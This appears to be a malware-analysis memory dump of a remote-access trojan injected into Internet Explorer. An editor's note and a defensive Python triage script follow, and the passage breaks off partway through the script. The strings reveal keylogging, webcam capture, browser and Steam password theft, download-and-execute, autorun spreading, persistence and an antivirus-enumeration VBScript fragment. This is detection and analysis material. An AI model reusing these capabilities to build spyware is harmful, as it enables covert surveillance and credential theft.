kernel32.dll
iexplore.exe_396_rwx_03540000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03580000_00001000:
kernel32.dll
iexplore.exe_396_rwx_035C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03600000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03630000_00001000:
mpr.dll
iexplore.exe_396_rwx_03770000_00001000:
mpr.dll
iexplore.exe_396_rwx_037B0000_00001000:
mpr.dll
iexplore.exe_396_rwx_037F0000_00001000:
mpr.dll
iexplore.exe_396_rwx_03820000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03960000_00001000:
gdi32.dll
iexplore.exe_396_rwx_039A0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_039E0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03A20000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03A60000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03AA0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03AE0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03B20000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03B60000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03BA0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03BE0000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03C20000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03C60000_00001000:
gdi32.dll
iexplore.exe_396_rwx_03C90000_00001000:
user32.dll
iexplore.exe_396_rwx_03DD0000_00001000:
user32.dll
iexplore.exe_396_rwx_03E10000_00001000:
user32.dll
iexplore.exe_396_rwx_03E50000_00001000:
user32.dll
iexplore.exe_396_rwx_03E80000_00001000:
keybd_event
iexplore.exe_396_rwx_03E90000_00001000:
user32.dll
iexplore.exe_396_rwx_03ED0000_00001000:
user32.dll
iexplore.exe_396_rwx_03F10000_00001000:
user32.dll
iexplore.exe_396_rwx_03F50000_00001000:
user32.dll
iexplore.exe_396_rwx_03F90000_00001000:
user32.dll
iexplore.exe_396_rwx_03FD0000_00001000:
user32.dll
iexplore.exe_396_rwx_04010000_00001000:
user32.dll
iexplore.exe_396_rwx_04050000_00001000:
user32.dll
iexplore.exe_396_rwx_04090000_00001000:
user32.dll
iexplore.exe_396_rwx_040D0000_00001000:
user32.dll
iexplore.exe_396_rwx_04110000_00001000:
user32.dll
iexplore.exe_396_rwx_04150000_00001000:
user32.dll
iexplore.exe_396_rwx_04190000_00001000:
pre>user32.dll</pre><b>iexplore.exe_396_rwx_041D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04210000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04250000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04290000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_042D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04310000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04350000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04390000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_043D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04410000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04440000_00001000:</b><pre>MapVirtualKeyA</pre><b>iexplore.exe_396_rwx_04450000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04490000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_044D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04510000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04550000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04590000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_045D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04610000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04650000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04690000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_046D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04710000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04750000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04790000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_047D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04810000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04850000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04890000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_048C0000_
00001000:</b><pre>GetKeyboardState</pre><b>iexplore.exe_396_rwx_048D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04900000_00001000:</b><pre>GetKeyboardLayoutNameA</pre><b>iexplore.exe_396_rwx_04910000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04940000_00001000:</b><pre>GetKeyState</pre><b>iexplore.exe_396_rwx_04950000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04990000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_049D0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04A90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04AD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B40000_00001000:</b><pre>GetAsyncKeyState</pre><b>iexplore.exe_396_rwx_04B50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04B90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04BD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C40000_00001000:</b><pre>ExitWindowsEx</pre><b>iexplore.exe_396_rwx_04C50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04C80000_00001000:</b><pre>EnumWindows</pre><b>iexplore.exe_396_rwx_04C90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04CD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04D90000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04DD0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04E90000_00001000:</b><pre>user32.dll
</pre><b>iexplore.exe_396_rwx_04ED0000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F10000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F50000_00001000:</b><pre>user32.dll</pre><b>iexplore.exe_396_rwx_04F80000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_050C0000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_05100000_00001000:</b><pre>ntdll.dll</pre><b>iexplore.exe_396_rwx_05130000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_05270000_00001000:</b><pre>kernel32.dll</pre><b>iexplore.exe_396_rwx_052A0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_053E0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05420000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05460000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_054A0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_054D0000_00001000:</b><pre>FtpGetFileSize</pre><b>iexplore.exe_396_rwx_054E0000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05510000_00001000:</b><pre>FtpSetCurrentDirectoryA</pre><b>iexplore.exe_396_rwx_05520000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05550000_00001000:</b><pre>FtpOpenFileA</pre><b>iexplore.exe_396_rwx_05560000_00001000:</b><pre>wininet.dll</pre><b>iexplore.exe_396_rwx_05590000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_056D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05710000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05750000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05790000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_057D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05810000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05850000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05890000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_058D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.e
xe_396_rwx_05910000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05950000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05990000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_059D0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A10000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A50000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05A90000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05AD0000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B10000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B50000_00001000:</b><pre>wsock32.dll</pre><b>iexplore.exe_396_rwx_05B80000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05CC0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05D00000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05D30000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05E70000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05EB0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05EF0000_00001000:</b><pre>ole32.dll</pre><b>iexplore.exe_396_rwx_05F20000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06060000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_060A0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_060E0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06120000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06160000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_061B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_061F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06230000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06270000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_062B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_062F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06330000_00001000:</b><pre>gdip
lus.dll</pre><b>iexplore.exe_396_rwx_06370000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_063B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_063E0000_00001000:</b><pre>GdiplusShutdown</pre><b>iexplore.exe_396_rwx_063F0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06430000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_06470000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_064B0000_00001000:</b><pre>gdiplus.dll</pre><b>iexplore.exe_396_rwx_064E0000_00001000:</b><pre>AVICAP32.DLL</pre><b>iexplore.exe_396_rwx_06620000_00001000:</b><pre>AVICAP32.DLL</pre><b>iexplore.exe_396_rwx_06650000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06690000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_066D0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06710000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06760000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_067A0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_067E0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06930000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_06970000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_069B0000_00001000:</b><pre>advapi32.dll</pre><b>iexplore.exe_396_rwx_069E0000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B20000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B60000_00001000:</b><pre>shell32.dll</pre><b>iexplore.exe_396_rwx_06B90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06CD0000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D10000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D50000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06D90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06DD0000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06E10000_00001000:</b><pre>winmm.dll</pre><b>iexplore.e
xe_396_rwx_06E50000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06E90000_00001000:</b><pre>winmm.dll</pre><b>iexplore.exe_396_rwx_06EC0000_00001000:</b><pre>powrprof.dll</pre><b>iexplore.exe_396_rwx_06F00000_00001000:</b><pre>powrprof.dll</pre><b>iexplore.exe_396_rwx_06F30000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07180000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_071C0000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07200000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07240000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07280000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_072C0000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07300000_00001000:</b><pre>msacm32.dll</pre><b>iexplore.exe_396_rwx_07330000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_07470000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_074B0000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_074F0000_00001000:</b><pre>ADVAPI32.DLL</pre><b>iexplore.exe_396_rwx_10410000_0005C000:</b><pre>.idata</pre><pre>.reloc</pre><pre>P.rsrc</pre><pre>kernel32.dll</pre><pre>Portions Copyright (c) 1999,2003 Avenger by NhT</pre><pre>SHFileOperationA</pre><pre>shell32.dll</pre><pre>URLDownloadToFileA</pre><pre>urlmon.dll</pre><pre>ShellExecuteA</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</pre><pre>GetWindowsDirectoryA</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>http\shell\open\command</pre><pre>\Internet Explorer\iexplore.exe</pre><pre>####@####</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>Portugal</pre><pre>Turkey</pre><pre>Windows 3.1</pre><pre>Windows 95 (Release 2)</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>%s %s</pre><pre>Windows XP 
Professional x64</pre><pre>Windows XP Home</pre><pre>Windows XP Professional</pre><pre>Windows 2000 Professional</pre><pre>Windows NT %d.%d</pre><pre>Windows 2008</pre><pre>%s %s Server</pre><pre>Windows 2003 Server Datacenter</pre><pre>Windows 2003 Server Enterprise</pre><pre>Windows 2003 Server Web Edition</pre><pre>Windows 2003 Server</pre><pre>Windows Home Server</pre><pre>Windows 2003 Server (Release 2)</pre><pre>Windows 2000 Server Datacenter</pre><pre>Windows 2000 Server Enterprise</pre><pre>Windows 2000 Server Web Edition</pre><pre>Windows 2000 Server</pre><pre>Windows NT 4.0 Server Datacenter</pre><pre>Windows NT 4.0 Server Enterprise</pre><pre>Windows NT 4.0 Server Web Edition</pre><pre>Windows NT 4.0 Server</pre><pre>Unknown Platform ID (%d)</pre><pre>%d.%d</pre><pre>%s (Build: %d</pre><pre>- Service Pack: %s</pre><pre>KERNEL32.DLL</pre><pre>teste.vbs</pre><pre>teste.txt</pre><pre>Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")</pre><pre>Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)</pre><pre>Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)</pre><pre>Set objFileSystem = CreateObject("Scripting.fileSystemObject")</pre><pre>Set objFile = objFileSystem.CreateTextFile("</pre><pre>Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter</pre><pre>Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter</pre><pre>objFile.WriteLine(Info)</pre><pre>objFile.Close</pre><pre>cscript.exe</pre><pre>AVICAP32.dll</pre><pre>tFtpAccess</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: 
exported symbol not found</pre><pre>SetupApi.dll</pre><pre>SetupDiOpenClassRegKey</pre><pre>SetupDiOpenClassRegKeyExA</pre><pre>SetupDiOpenClassRegKeyExW</pre><pre>SetupDiCreateDeviceInterfaceRegKeyA</pre><pre>SetupDiCreateDeviceInterfaceRegKeyW</pre><pre>SetupDiOpenDeviceInterfaceRegKey</pre><pre>SetupDiDeleteDeviceInterfaceRegKey</pre><pre>SetupDiCreateDevRegKeyA</pre><pre>SetupDiCreateDevRegKeyW</pre><pre>SetupDiOpenDevRegKey</pre><pre>SetupDiDeleteDevRegKey</pre><pre>CM_DEVCAP_LOCKSUPPORTED</pre><pre>CM_DEVCAP_EJECTSUPPORTED</pre><pre>PDCAP_D0_SUPPORTED</pre><pre>PDCAP_D1_SUPPORTED</pre><pre>PDCAP_D2_SUPPORTED</pre><pre>PDCAP_D3_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D0_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D1_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D2_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D3_SUPPORTED</pre><pre>PDCAP_WARM_EJECT_SUPPORTED</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>127.0.0.1</pre><pre>iphlpapi.dll</pre><pre>AllocateAndGetTcpExTableFromStack</pre><pre>AllocateAndGetUdpExTableFromStack</pre><pre>SetTcpEntry</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>Mozilla3_5Password</pre><pre>GetChromePass</pre><pre>StartHttpProxy</pre><pre>1.2.3</pre><pre>XxX.xXx</pre><pre>UuU.uUu</pre><pre>keyboardkey</pre><pre>webcaminactive</pre><pre>webcamgetbuffer</pre><pre>webcam</pre><pre>enviarexecnormal</pre><pre>enviarexechidden</pre><pre>openweb</pre><pre>downexec</pre><pre>sendftp</pre><pre>keylogger</pre><pre>keyloggergetlog</pre><pre>keyloggereraselog</pre><pre>keyloggerativar</pre><pre>keyloggerdesativar</pre><pre>renamekey</pre><pre>windowsfechar</pre><pre>windowsmax</pre><pre>windowsmin</pre><pre>windowsmostrar</pre><pre>windowsocultar</pre><pre>windowsmintodas</pre><pre>windowscaption</pre><pre>listarportas</pre><pre>listarportasdns</pre><pre>finalizarprocessoportas</pre><pre>webcamsettings</pre><pre>chatmsg</pre><pre>getpassword</pre><pre>upda
teservidorweb</pre><pre>keyloggersearch</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>PSAPI.dll</pre><pre>\config\SteamAppData.vdf</pre><pre>AutoLoginUser</pre><pre>/ClientRegistry.Blob</pre><pre>\ClientRegistry.blob</pre><pre>\steam.dll</pre><pre>%SYS%</pre><pre>ÞSKTOP%</pre><pre>TThreadSearch`%D</pre><pre>FirstExecution</pre><pre>chatmsg|</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>listarjanelas|windowsfechar|</pre><pre>listarjanelas|windowsmax|</pre><pre>listarjanelas|windowsmin|</pre><pre>listarjanelas|windowsmostrar|</pre><pre>listarjanelas|windowsocultar|</pre><pre>listarjanelas|windowsmintodas|</pre><pre>listarjanelas|windowscaption|</pre><pre>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>listarportas|listadeportaspronta|</pre><pre>listarportas|finalizarconexao|</pre><pre>listarportas|finalizarprocessoportas|Y|</pre><pre>listarportas|finalizarprocessoportas|N|</pre><pre>registro|renamekey|</pre><pre>keylogger|keylogger|keyloggerativar|</pre><pre>keylogger|keylogger|keyloggerdesativar|</pre><pre>keylogger|keyloggergetlog|</pre><pre>keylogger|keylogger|keyloggervazio|</pre><pre>keyloggersearchok|</pre><pre>webcam|webcaminactive|</pre><pre>webcam|webcamactive|</pre><pre>_x_X_PASSWORDLIST_X_x_</pre><pre>NOIP.abc</pre><pre>MSN.abc</pre><pre>FIREFOX.abc</pre><pre>IELOGIN.abc</pre><pre>IEPASS.abc</pre><pre>IEAUTO.abc</pre><pre>IEWEB.abc</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox</pre><pre>getfirefox</pre><pre>getielogin</pre><pre>getiepass</pre><pre>getieweb</pre><pre>getchrome</pre><pre>getpassword|getpasswordlist|</pre><pre>getpassword|getpassworderror|</pre><pre>##@@## ##@@## 
##@@##</pre><pre>Windows\CurrentVersion\Uninstall\eDonkey2000</pre><pre>UNWISE.EXE</pre><pre>ntdll.dll</pre><pre>icon=shell32.dll,4</pre><pre>shellexecute=</pre><pre>autorun.inf</pre><pre>XX--XX--XX.txt</pre><pre>logs.dat</pre><pre>SQLite3.dll</pre><pre>deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>GetProcessHeap</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>oleaut32.dll</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyA</pre><pre>WinExec</pre><pre>SetNamedPipeHandleState</pre><pre>CreatePipe</pre><pre>mpr.dll</pre><pre>gdi32.dll</pre><pre>keybd_event</pre><pre>MapVirtualKeyA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutNameA</pre><pre>GetKeyState</pre><pre>GetAsyncKeyState</pre><pre>ExitWindowsEx</pre><pre>EnumWindows</pre><pre>wininet.dll</pre><pre>FtpGetFileSize</pre><pre>FtpSetCurrentDirectoryA</pre><pre>FtpOpenFileA</pre><pre>wsock32.dll</pre><pre>ole32.dll</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>AVICAP32.DLL</pre><pre>winmm.dll</pre><pre>powrprof.dll</pre><pre>msacm32.dll</pre><pre>ADVAPI32.DLL</pre><pre>7-727:7?7</pre><pre>4.4 5=5`5|5 6</pre><pre>> >$>(>,></pre><pre>>'>3><>]>}></pre><pre>040=0^0~0</pre><pre>2 2/2]2}2</pre><pre>:$:6:^:~:</pre><pre>; ;%;-;5;</pre><pre>KWindows</pre><pre>UnitExecutarComandos</pre><pre>uftp</pre><pre>UrlMon</pre><pre>.UnitBytesSize</pre><pre>UnitListarPortasAtivas</pre><pre>UnitWebcam</pre><pre>UnitKeylogger</pre></requestedExecutionLevel>
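Editor's note on reading the listing above. The regions fall into two groups. The 0x5C000-byte RWX region at 10410000 inside iexplore.exe holds PE section names (.idata, .reloc, .rsrc) together with the error strings of a BTMemoryLoadLibrary-style in-memory PE loader (BuildImportTable: can't load library:, BTMemoryGetProcAddress: exported symbol not found), which is how a Delphi payload gets mapped into a host process without touching LoadLibrary on disk; the dozens of single-page RWX allocations each hold one DLL or export name and are consistent with that loader resolving imports. The strings in the large region spell out the capability set: keyboard-state APIs (GetAsyncKeyState, GetKeyboardState, keybd_event) and keylogger commands, AVICAP32 webcam capture, WinInet FTP calls plus a sendftp command, URLDownloadToFileA and ShellExecuteA for download-and-execute, browser and Steam credential targets (Mozilla3_5Password, GetChromePass, SteamAppData.vdf, ClientRegistry.blob), Run and Policies\Explorer\Run persistence keys, autorun.inf spreading, a VBScript run through cscript.exe that queries root\SecurityCenter for installed FirewallProduct and AntiVirusProduct entries, and a Portuguese-language, pipe-delimited command protocol (listarportas|finalizarprocessoportas|Y|, keylogger|keyloggergetlog|). The Python below is an added example from the editor, not Lavasoft's code: it parses entries in the report's own `<b>label:</b><pre>string</pre>` form and produces that summary. The capability-to-indicator table is the editor's own and uses only strings present above; the sample input is a constructed subset of the listing.

```python
"""
Triage helper for memory-region string dumps in the form used above.

Added example for this page (not the analysis system's own code). It parses
the "<process>_<pid>_<prot>_<base>_<size>:" labels and the <pre> strings under
them, separates the one-page RWX stubs from the large RWX image, and maps the
recovered strings to capabilities. The indicator table is the editor's choice.
"""
import re
from dataclasses import dataclass, field

PAGE = 0x1000
ENTRY_RE = re.compile(r"<b>([^<]+):</b>((?:<pre>.*?</pre>)*)", re.S)
PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)

# Capability -> substrings that indicate it (every indicator appears in the dump).
CAPABILITIES = {
    "keylogging": ("GetAsyncKeyState", "GetKeyState", "GetKeyboardState",
                   "MapVirtualKeyA", "keybd_event", "keylogger"),
    "webcam capture": ("AVICAP32", "webcam"),
    "ftp exfiltration": ("FtpOpenFileA", "FtpSetCurrentDirectoryA",
                         "FtpGetFileSize", "sendftp"),
    "download and execute": ("URLDownloadToFileA", "downexec",
                             "ShellExecuteA", "WinExec"),
    "credential theft": ("GetChromePass", "Mozilla3_5Password",
                         "SteamAppData.vdf", "_x_X_PASSWORDLIST_X_x_"),
    "removable-drive spreading": ("autorun.inf", "shellexecute=",
                                  "icon=shell32.dll"),
    "registry persistence": ("CurrentVersion\\Run", "Policies\\Explorer\\Run"),
    "in-memory PE loading": ("BTMemoryLoadLibary", "BuildImportTable"),
    "system shutdown": ("ExitWindowsEx",),
}


@dataclass
class Region:
    process: str
    pid: int
    prot: str
    base: int
    size: int
    strings: list = field(default_factory=list)


def parse_dump(text):
    """Parse '<b>label:</b><pre>s</pre>...' entries into Region objects.
    Extraction splits entries across physical lines, so join the raw
    lines with '' (not a newline) before calling this."""
    regions = []
    for label, body in ENTRY_RE.findall(text):
        process, pid, prot, base, size = label.rsplit("_", 4)
        regions.append(Region(process, int(pid), prot, int(base, 16),
                              int(size, 16), PRE_RE.findall(body)))
    return regions


def classify(strings):
    """Map strings to capabilities: {capability: sorted matching strings}."""
    found = {}
    for cap, indicators in CAPABILITIES.items():
        hits = sorted({s for s in strings if any(i in s for i in indicators)})
        if hits:
            found[cap] = hits
    return found


def summarize(regions):
    """Separate one-page RWX stubs (each holding a single DLL/API name) from
    larger RWX images (candidate in-memory mapped payload) and classify all
    strings seen across the regions."""
    rwx = [r for r in regions if r.prot == "rwx"]
    return {
        "rwx_regions": len(rwx),
        "single_page_rwx": sum(1 for r in rwx if r.size == PAGE),
        "large_rwx": [(r.base, r.size) for r in rwx if r.size > PAGE],
        "capabilities": classify([s for r in regions for s in r.strings]),
    }


# Constructed sample: a subset of the entries above, in the report's own form.
SAMPLE_DUMP = (
    "<b>iexplore.exe_396_rwx_034B0000_00001000:</b><pre>CreatePipe</pre>"
    "<b>iexplore.exe_396_rwx_03E80000_00001000:</b><pre>keybd_event</pre>"
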